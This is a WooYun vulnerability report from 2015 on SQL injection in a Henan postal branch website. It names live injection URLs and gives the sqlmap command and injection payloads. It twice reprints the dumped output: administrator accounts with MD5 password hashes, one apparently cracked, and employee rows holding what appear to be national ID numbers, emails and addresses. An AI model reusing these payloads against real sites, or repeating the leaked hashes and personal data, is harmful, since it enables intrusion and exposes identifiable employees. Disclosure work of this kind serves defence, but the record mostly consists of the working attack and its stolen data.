当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098249

漏洞标题:河南省邮政公司郑州市分公司SQL注入一枚

相关厂商:中国邮政集团公司信息技术局

漏洞作者: Taro

提交时间:2015-02-27 17:52

修复时间:2015-04-13 17:54

公开时间:2015-04-13 17:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

SQL注入部分员工信息泄漏!

详细说明:

注入点:
http://www.zz185.com/list_new.asp?spe_id=292
http://www.zz185.com/news.asp?id=672
通过注入,可以获取到管理员的信息及员工信息
以http://www.zz185.com/list_new.asp?spe_id=292为例测试:
sqlmap -u "http://www.zz185.com/list_new.asp?spe_id=292"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: spe_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: spe_id=292 AND 4474=4474
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: spe_id=292 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(111)&CHR(116)&CHR(106)&CHR(113)&CHR(105)&CHR(108)&CHR(97)&CHR(86)&CHR(82)&CHR(74)&CHR(79)&CHR(107)&CHR(77)&CHR(81)&CHR(113)&CHR(114)&CHR(105)&CHR(110)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[9 tables]
+----------+
| order |
| user |
| article |
| book |
| employee |
| job |
| news |
| study |
| subject |
+----------+


Database: Microsoft_Access_masterdb
Table: user
[8 entries]
+----+-------------------------------------------+------+-------------+
| id | pwd | data | user |
+----+-------------------------------------------+------+-------------+
| 59 | 661d3e77ca51e37454743ce331203176 | <blank> | x_admin |
| 65 | e3798cedd56de01caaa3ce86e2e2c32b (198384) | <blank> | renliang |
| 67 | 0ebf9d46628c831b496ed6469383d56d | <blank> | youzhengbao |
| 68 | c6cb0cb87e8144b564a7162793b3a836 | <blank> | shichangbu |
| 69 | 1c11a410660d28be375a672c423805e6 | <blank> | 123 |
| 70 | 6d07dc3c0cc4be72c25c8cd64072ccde | <blank> | 2876 |
| 71 | c4e75e3102759734197db0d546b30349 | <blank> | hongfei |
| 72 | 5b5de03dc3a4789c250074a20d2a7daa | <blank> | weihu |
+----+-------------------------------------------+------+-------------+


Database: Microsoft_Access_masterdb
Table: employee
[322 entries]
+-----+--------------------+----+--------------------------------+------+-------+-----------+
| id | job_id | pc | mail | data | grade | address |
+-----+--------------------+----+--------------------------------+------+-------+-----------+
| 100 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 101 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 102 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 103 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 104 | 41012355968511 | 1 | NULL | <blank> | NULL | <blank> |
| 105 | 410305198204284510 | 3 | [email protected] | <blank> | 大专 | 河南洛 |
| 106 | 410305198204284510 | 3 | [email protected] | <blank> | 大专 | 河南洛 |
| 107 | 410725198408107214 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 108 | 410725198408107214 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 109 | 410725198408107214 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 110 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 111 | 411024198308297731 | 2 | [email protected] | <blank> | 本科 | <blank> |
| 112 | 410103198206121340 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 113 | 410103198206121340 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 114 | 410103198206121340 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 115 | 410421820406454 | 1 | [email protected] | <blank> | 大专 | <blank> |
| 116 | 410421820406454 | 1 | [email protected] | <blank> | 大专 | <blank> |
| 117 | 410421820406454 | 1 | [email protected] | <blank> | 大专 | <blank> |
| 118 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> |
| 119 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> |
| 120 | 410621198904161526 | 1 | [email protected] | <blank> | <blank> | 河南剩 |
| 121 | 410621198904161526 | 1 | [email protected] | <blank> | <blank> | 河南剩 |
| 122 | 410825198501193538 | 1 | [email protected] | <blank> | 大专 | 河南省焦作 |
| 123 | 410825198501193538 | 1 | [email protected] | <blank> | 大专 | 河南省焦作 |
| 124 | 410102198505120018 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 125 | 410102198405250093 | 3 | [email protected] | <blank> | 大专 | <blank> |
| 126 | 3 | <blank> |
.........
.........
.........
+-----+--------------------+----+--------------------------------+------+-------+-----------+


漏洞证明:

以http://www.zz185.com/list_new.asp?spe_id=292为例测试:
sqlmap -u "http://www.zz185.com/list_new.asp?spe_id=292"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: spe_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: spe_id=292 AND 4474=4474
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: spe_id=292 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(111)&CHR(116)&CHR(106)&CHR(113)&CHR(105)&CHR(108)&CHR(97)&CHR(86)&CHR(82)&CHR(74)&CHR(79)&CHR(107)&CHR(77)&CHR(81)&CHR(113)&CHR(114)&CHR(105)&CHR(110)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[9 tables]
+----------+
| order |
| user |
| article |
| book |
| employee |
| job |
| news |
| study |
| subject |
+----------+


Database: Microsoft_Access_masterdb
Table: user
[8 entries]
+----+-------------------------------------------+------+-------------+
| id | pwd | data | user |
+----+-------------------------------------------+------+-------------+
| 59 | 661d3e77ca51e37454743ce331203176 | <blank> | x_admin |
| 65 | e3798cedd56de01caaa3ce86e2e2c32b (198384) | <blank> | renliang |
| 67 | 0ebf9d46628c831b496ed6469383d56d | <blank> | youzhengbao |
| 68 | c6cb0cb87e8144b564a7162793b3a836 | <blank> | shichangbu |
| 69 | 1c11a410660d28be375a672c423805e6 | <blank> | 123 |
| 70 | 6d07dc3c0cc4be72c25c8cd64072ccde | <blank> | 2876 |
| 71 | c4e75e3102759734197db0d546b30349 | <blank> | hongfei |
| 72 | 5b5de03dc3a4789c250074a20d2a7daa | <blank> | weihu |
+----+-------------------------------------------+------+-------------+


Database: Microsoft_Access_masterdb
Table: employee
[322 entries]
+-----+--------------------+----+--------------------------------+------+-------+-----------+
| id | job_id | pc | mail | data | grade | address |
+-----+--------------------+----+--------------------------------+------+-------+-----------+
| 100 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 101 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 102 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 103 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 104 | 41012355968511 | 1 | NULL | <blank> | NULL | <blank> |
| 105 | 410305198204284510 | 3 | [email protected] | <blank> | 大专 | 河南洛 |
| 106 | 410305198204284510 | 3 | [email protected] | <blank> | 大专 | 河南洛 |
| 107 | 410725198408107214 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 108 | 410725198408107214 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 109 | 410725198408107214 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 110 | 410402198309265531 | 3 | [email protected] | <blank> | 大专 | 河南省登封市 |
| 111 | 411024198308297731 | 2 | [email protected] | <blank> | 本科 | <blank> |
| 112 | 410103198206121340 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 113 | 410103198206121340 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 114 | 410103198206121340 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 115 | 410421820406454 | 1 | [email protected] | <blank> | 大专 | <blank> |
| 116 | 410421820406454 | 1 | [email protected] | <blank> | 大专 | <blank> |
| 117 | 410421820406454 | 1 | [email protected] | <blank> | 大专 | <blank> |
| 118 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> |
| 119 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> |
| 120 | 410621198904161526 | 1 | [email protected] | <blank> | <blank> | 河南剩 |
| 121 | 410621198904161526 | 1 | [email protected] | <blank> | <blank> | 河南剩 |
| 122 | 410825198501193538 | 1 | [email protected] | <blank> | 大专 | 河南省焦作 |
| 123 | 410825198501193538 | 1 | [email protected] | <blank> | 大专 | 河南省焦作 |
| 124 | 410102198505120018 | 2 | [email protected] | <blank> | 大专 | <blank> |
| 125 | 410102198405250093 | 3 | [email protected] | <blank> | 大专 | <blank> |
| 126 | 3 | <blank> |
.........
.........
.........
+-----+--------------------+----+--------------------------------+------+-------+-----------+


修复方案:

版权声明:转载请注明来源 Taro@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-02-28 08:32

厂商回复:

谢谢

最新状态:

暂无